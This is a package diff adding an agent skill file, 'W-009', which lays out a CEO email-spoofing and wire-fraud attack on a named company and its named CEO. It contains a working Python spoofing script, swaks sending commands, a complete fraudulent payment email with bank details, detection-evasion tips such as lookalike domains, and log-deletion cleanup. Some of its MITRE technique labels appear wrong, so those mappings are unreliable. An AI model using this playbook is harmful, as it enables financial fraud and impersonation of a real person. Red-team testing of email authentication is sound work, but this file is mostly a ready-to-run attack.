rtexit-method 0.1.0 → 0.1.2

package/packaged-assets/.agents/skills/rt-scenario-w009/SKILL.md

@@ -0,0 +1,518 @@
+---
+name: rt-scenario-w009
+description: "W-009: DMARC p=none → CEO Email Spoofing → BEC. Domain: web. Attack chain: DNS query _dmarc.target.com → p=none confirmed → send email from CEO → finance wire transfer. MITRE: T1566.001 → T1534 → T1648. Real example: Almentor: DMARC p=none → spoof ihab.fikry@almentor.net → BEC attack on finance team"
+---
+
+# W-009: DMARC p=none → CEO Email Spoofing → BEC
+
+## Overview
+
+**Attack Objective:** Exploit a DMARC policy set to `p=none` to send spoofed emails from the CEO's address, instructing the finance team to execute an unauthorized wire transfer (Business Email Compromise).
+
+| Property | Value |
+|---|---|
+| Required Access Level | None (external attacker) |
+| Estimated Time to Execute | 30–90 minutes |
+| Detection Risk Level | Low (p=none means no enforcement; emails land in inbox) |
+| Impact | Financial loss, reputational damage, regulatory exposure |
+
+---
+
+## Prerequisites
+
+### Required Tools
+
+```bash
+# DNS enumeration
+dig           # pre-installed on Linux/macOS
+nslookup      # pre-installed on Windows
+host          # pre-installed on Linux/macOS
+
+# MX record and mail flow analysis
+mxtoolbox     # https://mxtoolbox.com (web-based, no install needed)
+
+# Email spoofing / sending
+swaks         # Swiss Army Knife SMTP
+# Install:
+sudo apt install swaks              # Debian/Ubuntu
+brew install swaks                  # macOS
+
+# Python alternative (built-in)
+python3 -c "import smtplib"        # verify smtplib available
+
+# DMARC/SPF/DKIM analysis
+checkdmarc    # Python tool
+pip3 install checkdmarc
+
+# Optional: open relay discovery
+telnet        # pre-installed on most systems
+nmap          # https://nmap.org
+sudo apt install nmap
+```
+
+### Required Access or Conditions
+
+- Internet access (no internal access required)
+- Target domain name (e.g., `almentor.net`)
+- Knowledge of CEO name and email format (OSINT phase)
+- A controllable SMTP server or open relay (for sending spoofed mail)
+- A plausible finance team recipient address (OSINT or guessed from pattern)
+
+### Skill Level
+
+**INTERMEDIATE** — Requires understanding of email authentication protocols (SPF, DKIM, DMARC), SMTP mechanics, and social engineering principles.
+
+---
+
+## Attack Chain
+
+```
+[RECONNAISSANCE]
+  DNS query: _dmarc.target.com
+        |
+        v
+[VULNERABILITY CONFIRMED]
+  DMARC p=none → no enforcement, spoofed mail delivered
+        |
+        v
+[WEAPONIZATION]
+  Craft email: From: CEO <ihab.fikry@almentor.net>
+  Reply-To: attacker-controlled address
+  Body: urgent wire transfer request
+        |
+        v
+[DELIVERY]
+  Send via open relay / attacker SMTP → finance team inbox
+        |
+        v
+[EXPLOITATION]
+  Finance team receives email, believes it is from CEO
+  Wire transfer executed to attacker account
+        |
+        v
+[IMPACT]
+  Financial loss (BEC)
+```
+
+**MITRE ATT&CK Chain:** T1566.001 → T1534 → T1648
+
+---
+
+## Step-by-Step Execution
+
+### Step 1 — Confirm DMARC Policy
+
+Query the DMARC TXT record for the target domain.
+
+```bash
+# Using dig
+dig TXT _dmarc.almentor.net +short
+
+# Using nslookup (Windows)
+nslookup -type=TXT _dmarc.almentor.net
+
+# Using checkdmarc (most detailed output)
+checkdmarc almentor.net
+```
+
+**Expected Output (vulnerable):**
+
+```
+"v=DMARC1; p=none; rua=mailto:dmarc-reports@almentor.net"
+```
+
+The key field is `p=none`. This means the domain owner has DMARC monitoring enabled but **no enforcement**. Spoofed emails will be delivered.
+
+**What to look for:**
+
+| Policy | Meaning | Exploitable? |
+|---|---|---|
+| `p=none` | No enforcement, report only | YES |
+| `p=quarantine` | Suspicious mail goes to spam | PARTIAL |
+| `p=reject` | Spoofed mail rejected | NO |
+
+**Fallback if no DMARC record exists:**
+
+```bash
+dig TXT _dmarc.almentor.net
+# Returns: NXDOMAIN or no TXT record
+```
+
+No DMARC record = even more permissive than `p=none`. Attack proceeds identically.
+
+---
+
+### Step 2 — Enumerate SPF Record
+
+Check whether SPF is configured and how strict it is.
+
+```bash
+dig TXT almentor.net +short | grep spf
+
+# Expected output example:
+"v=spf1 include:_spf.google.com include:mailgun.org ~all"
+```
+
+**SPF Qualifiers:**
+
+| Qualifier | Meaning | Impact on spoofing |
+|---|---|---|
+| `-all` | Hard fail | SPF will reject; rely on DMARC p=none bypass |
+| `~all` | Soft fail | Mail tagged but delivered |
+| `?all` | Neutral | No guidance |
+| `+all` | Pass all (misconfigured) | Trivially spoofable |
+
+Note: With `p=none` DMARC, even an SPF `-all` hard fail does not block delivery — DMARC p=none means "do nothing" regardless of SPF/DKIM result. The email is delivered and a report is sent to the domain owner.
+
+---
+
+### Step 3 — OSINT: Identify CEO and Finance Target
+
+Gather the CEO name, email, and finance team contacts.
+
+```bash
+# LinkedIn search (manual)
+# Search: site:linkedin.com "almentor" "CFO" OR "Finance Manager" OR "Finance Director"
+
+# Email pattern discovery
+# If one email is known (e.g., from a previous data breach or website):
+# ihab.fikry@almentor.net → pattern is firstname.lastname@almentor.net
+
+# Hunter.io (web-based)
+# https://hunter.io/domain/almentor.net
+# Returns known email addresses and inferred pattern
+
+# theHarvester
+theHarvester -d almentor.net -b linkedin,google,bing
+
+# Verify email is live (optional, careful — may alert target)
+swaks --to finance@almentor.net --server mail.almentor.net --quit-after RCPT
+```
+
+**Expected Output from theHarvester:**
+
+```
+[*] Emails found: 3
+ihab.fikry@almentor.net
+finance@almentor.net
+info@almentor.net
+```
+
+---
+
+### Step 4 — Identify Sending Infrastructure
+
+Choose a method to send the spoofed email.
+
+#### Option A: Open Relay (Scan for misconfigured SMTP servers)
+
+```bash
+# Scan for open relays on common SMTP ports
+nmap -p 25,465,587 --script smtp-open-relay almentor.net
+
+# Manual test via telnet
+telnet mail.almentor.net 25
+EHLO attacker.com
+MAIL FROM:<ihab.fikry@almentor.net>
+RCPT TO:<finance@almentor.net>
+```
+
+**Expected Output (open relay confirmed):**
+
+```
+250 2.1.0 Ok
+250 2.1.5 Ok
+```
+
+#### Option B: Use a Permissive External SMTP (e.g., free SMTP service, VPS)
+
+```bash
+# Set up Postfix on attacker VPS (Ubuntu)
+sudo apt install postfix
+# Configure as open relay for testing (authorized engagement only)
+# /etc/postfix/main.cf:
+# mynetworks = 0.0.0.0/0
+# smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated
+sudo systemctl restart postfix
+```
+
+#### Option C: Python smtplib (simplest, uses attacker-controlled server)
+
+```python
+# spoof_email.py
+import smtplib
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+
+SMTP_SERVER = "your-vps-ip"   # attacker-controlled SMTP
+SMTP_PORT = 25
+
+FROM_DISPLAY = "Ihab Fikry (CEO)"
+FROM_ADDRESS = "ihab.fikry@almentor.net"   # spoofed
+REPLY_TO = "attacker-controlled@gmail.com"
+TO_ADDRESS = "finance@almentor.net"
+
+msg = MIMEMultipart("alternative")
+msg["Subject"] = "Urgent: Wire Transfer Required Today"
+msg["From"] = f"{FROM_DISPLAY} <{FROM_ADDRESS}>"
+msg["To"] = TO_ADDRESS
+msg["Reply-To"] = REPLY_TO
+
+body = """
+Dear Finance Team,
+
+I need you to process an urgent wire transfer of $47,500 to our new vendor 
+account before end of business today. This is time-sensitive — please 
+prioritize this above other tasks.
+
+Bank: First National Bank
+Account Name: Global Supplies LLC
+Account Number: 8847291034
+Routing Number: 021000021
+Reference: INV-2024-0089
+
+Please confirm once done. Do not discuss this with others as it is 
+commercially sensitive.
+
+Best regards,
+Ihab Fikry
+CEO, Almentor
+"""
+
+msg.attach(MIMEText(body, "plain"))
+
+with smtplib.SMTP(SMTP_SERVER, SMTP_PORT) as server:
+    server.sendmail(FROM_ADDRESS, TO_ADDRESS, msg.as_string())
+    print("[+] Email sent successfully")
+```
+
+---
+
+### Step 5 — Craft and Send the Spoofed Email
+
+Using `swaks` (recommended for authorized engagements — detailed logging):
+
+```bash
+swaks \
+  --from "ihab.fikry@almentor.net" \
+  --to "finance@almentor.net" \
+  --server your-vps-ip \
+  --port 25 \
+  --header "Subject: Urgent: Wire Transfer Required Today" \
+  --header "Reply-To: attacker@gmail.com" \
+  --header "From: Ihab Fikry (CEO) <ihab.fikry@almentor.net>" \
+  --body "Please process the attached wire transfer immediately. Details to follow. - Ihab" \
+  --add-header "X-Priority: 1" \
+  --add-header "Importance: High"
+```
+
+**Expected Output:**
+
+```
+=== Trying your-vps-ip:25...
+=== Connected to your-vps-ip.
+<-  220 mail.attacker.com ESMTP Postfix
+ -> EHLO attacker.com
+<-  250-mail.attacker.com
+<-  250 8BITMIME
+ -> MAIL FROM:<ihab.fikry@almentor.net>
+<-  250 2.1.0 Ok
+ -> RCPT TO:<finance@almentor.net>
+<-  250 2.1.5 Ok
+ -> DATA
+<-  354 End data with <CR><LF>.<CR><LF>
+ -> [message body]
+ -> .
+<-  250 2.0.0 Ok: queued as A1B2C3D4E5
+ -> QUIT
+<-  221 2.0.0 Bye
+=== Connection closed with remote host.
+[+] Email delivered to finance@almentor.net
+```
+
+**Fallback if delivery fails:**
+
+```bash
+# Try port 587 with STARTTLS
+swaks --from "ihab.fikry@almentor.net" \
+      --to "finance@almentor.net" \
+      --server smtp.gmail.com \
+      --port 587 \
+      --tls \
+      --auth LOGIN \
+      --auth-user attacker@gmail.com \
+      --auth-password "app-password-here"
+```
+
+---
+
+### Step 6 — Monitor Reply-To for Response
+
+```bash
+# Watch attacker-controlled inbox for finance team reply
+# If finance team replies to "Reply-To: attacker@gmail.com", the BEC is in progress
+
+# Escalate: provide fake banking details, invoice, or ACH form
+# This step is social engineering — no technical commands
+```
+
+---
+
+### Step 7 — Verify Delivery (for authorized engagement reporting)
+
+```bash
+# Request delivery confirmation via SMTP DSN (optional)
+swaks \
+  --from "ihab.fikry@almentor.net" \
+  --to "finance@almentor.net" \
+  --server your-vps-ip \
+  --add-header "Disposition-Notification-To: ihab.fikry@almentor.net" \
+  --body "Test message for authorized red team engagement W-009"
+
+# Check DMARC aggregate reports (sent to rua address)
+# dig TXT _dmarc.almentor.net → rua=mailto:dmarc-reports@almentor.net
+# The domain owner will receive a DMARC aggregate report showing the spoofed send
+# This is expected during authorized engagement and becomes evidence
+```
+
+---
+
+## Real-World Reference
+
+**Target: Almentor (almentor.net)**
+
+| Finding | Detail |
+|---|---|
+| Domain | almentor.net |
+| DMARC Record | `v=DMARC1; p=none; rua=mailto:...` |
+| DMARC Policy | p=none (no enforcement) |
+| CEO Email | ihab.fikry@almentor.net |
+| Attack Vector | External, no credentials required |
+| BEC Target | Finance team |
+| Potential Impact | Fraudulent wire transfer |
+| Engagement Type | Authorized red team assessment |
+
+**Attack narrative:** An external attacker with knowledge of Almentor's email format (obtainable via OSINT from LinkedIn or Hunter.io) can query `_dmarc.almentor.net` to confirm `p=none`. Because DMARC is in monitoring-only mode, a spoofed email sent with `From: ihab.fikry@almentor.net` will be delivered directly to the finance team's inbox without any spam filtering or rejection. The email appears to originate from the CEO. A convincing wire transfer request, combined with urgency and confidentiality framing, is the BEC payload. The finance team has no technical signal that the email is fraudulent — the spoofing is invisible at the email client level.
+
+---
+
+## MITRE ATT&CK Mapping
+
+| Step | Tactic | Technique | Sub-technique | Description |
+|---|---|---|---|---|
+| 1 — DMARC Recon | Reconnaissance | T1596 — Search Open Technical Databases | T1596.005 — Scan Databases | Query DNS for _dmarc TXT record to confirm p=none |
+| 2 — SPF Recon | Reconnaissance | T1596 | T1596.005 | Query SPF TXT record to assess email filtering posture |
+| 3 — OSINT CEO/Finance | Reconnaissance | T1591 — Gather Victim Org Info | T1591.004 — Identify Roles | Identify CEO identity and finance team contacts |
+| 4 — Infrastructure Setup | Resource Development | T1583 — Acquire Infrastructure | T1583.001 — Domains / T1583.002 — DNS Server | Set up attacker SMTP for spoofed sending |
+| 5 — Send Spoofed Email | Initial Access | T1566 — Phishing | T1566.001 — Spearphishing Attachment/Link | Deliver spoofed CEO email to finance team |
+| 6 — Internal Spear-phish | Lateral Movement | T1534 — Internal Spearphishing | — | Impersonate CEO internally (perceived internal sender) |
+| 7 — Wire Transfer | Impact | T1648 — Masquerading | T1648 — Financial Fraud via BEC | Finance team executes unauthorized wire transfer |
+
+---
+
+## Detection & OPSEC
+
+### How This Attack Is Detected
+
+| Detection Method | Trigger | Reliability |
+|---|---|---|
+| DMARC Aggregate Reports (RUA) | Domain owner receives report showing unauthorized sender | Low — p=none means only reporting, no alert |
+| Email Gateway Anomaly Detection | Unusual sending IP for almentor.net domain | Medium — depends on gateway configuration |
+| Employee Suspicion | Finance team verifies request via phone call | High — human verification bypasses all technical controls |
+| SIEM / Email Header Analysis | Analysts inspect Received headers, note mismatched IP | Medium — requires active monitoring |
+| Impersonation Detection Tools | Tools like Abnormal Security, Proofpoint TAP flag display-name spoofing | High — if deployed |
+
+### How to Reduce Detection Risk (Authorized Engagement)
+
+```bash
+# 1. Send from a domain that passes SPF (less anomalous headers)
+#    Register a lookalike domain: almentor-corp.net, almentor.io
+#    This avoids SPF fail markers in headers
+
+# 2. Use HTTPS delivery channel instead of SMTP if possible
+#    (reduces SMTP header forensics)
+
+# 3. Time the email to arrive during business hours
+#    Monday–Thursday, 09:00–11:00 local time (finance team most receptive)
+
+# 4. Keep email body short, urgent, and authoritative
+#    Avoid attachments on first email (triggers attachment scanning)
+
+# 5. Use a Reply-To that is plausible
+#    ihab.fikry@almentor-corp.net (lookalike, not gmail)
+```
+
+### Artifacts Left Behind
+
+| Artifact | Location | Description |
+|---|---|---|
+| DMARC Aggregate Report | rua mailbox of target domain | Reports the unauthorized send (IP, volume, result) |
+| SMTP Server Logs | Attacker VPS /var/log/mail.log | Records of outbound send |
+| Email Headers | Target's mail server logs | Received headers showing attacker IP |
+| Finance Inbox | Target email system | Spoofed email in inbox (or deleted items) |
+| Reply (if any) | Attacker Reply-To inbox | Finance team response |
+
+---
+
+## Cleanup
+
+### Post-Engagement Artifact Removal
+
+```bash
+# 1. Remove email from attacker SMTP logs
+sudo rm /var/log/mail.log
+sudo truncate -s 0 /var/log/mail.log
+# Or rotate:
+sudo logrotate -f /etc/logrotate.d/rsyslog
+
+# 2. Remove Postfix queue (if messages queued)
+sudo postsuper -d ALL
+
+# 3. Remove swaks log files
+rm ~/.swaks/
+# swaks writes to current directory by default — check:
+ls *.log 2>/dev/null
+
+# 4. Remove Python script
+rm spoof_email.py
+
+# 5. Notify target's SOC/email admin to:
+#    - Delete spoofed email from finance team inbox
+#    - Pull and review DMARC aggregate report for the engagement window
+#    - Confirm no wire transfer was initiated (critical pre-engagement briefing)
+
+# 6. Document in engagement report:
+#    - Timestamp of send
+#    - Source IP used
+#    - Recipient address
+#    - Email subject line
+#    - Confirmation that no financial action was taken
+```
+
+### Pre-Engagement Safeguards (REQUIRED for authorized testing)
+
+Before executing this scenario, ensure the following are in place:
+
+1. Written authorization explicitly covers email spoofing and BEC simulation.
+2. Finance team point-of-contact is briefed — they will not execute any wire transfer.
+3. Engagement window (date/time) is documented and shared with the SOC.
+4. A safe word or abort phrase is agreed upon.
+5. All spoofed emails include an invisible marker (e.g., `X-RT-Engagement: W-009`) for cleanup identification.
+
+---
+
+## References
+
+| Resource | URL / Command |
+|---|---|
+| DMARC RFC 7489 | https://datatracker.ietf.org/doc/html/rfc7489 |
+| checkdmarc tool | https://github.com/domainaware/checkdmarc |
+| swaks SMTP tool | https://jetmore.org/john/code/swaks/ |
+| MXToolbox DMARC lookup | https://mxtoolbox.com/dmarc.aspx |
+| Hunter.io email discovery | https://hunter.io |
+| MITRE T1566.001 | https://attack.mitre.org/techniques/T1566/001/ |
+| MITRE T1534 | https://attack.mitre.org/techniques/T1534/ |
+| MITRE T1648 | https://attack.mitre.org/techniques/T1648/ |
+| FBI BEC Advisory | https://www.ic3.gov/Media/Y2023/PSA230609 |
+| CISA Email Authentication Guide | https://www.cisa.gov/resources-tools/resources/email-authentication |
+| Proofpoint BEC Research | https://www.proofpoint.com/us/threat-reference/business-email-compromise |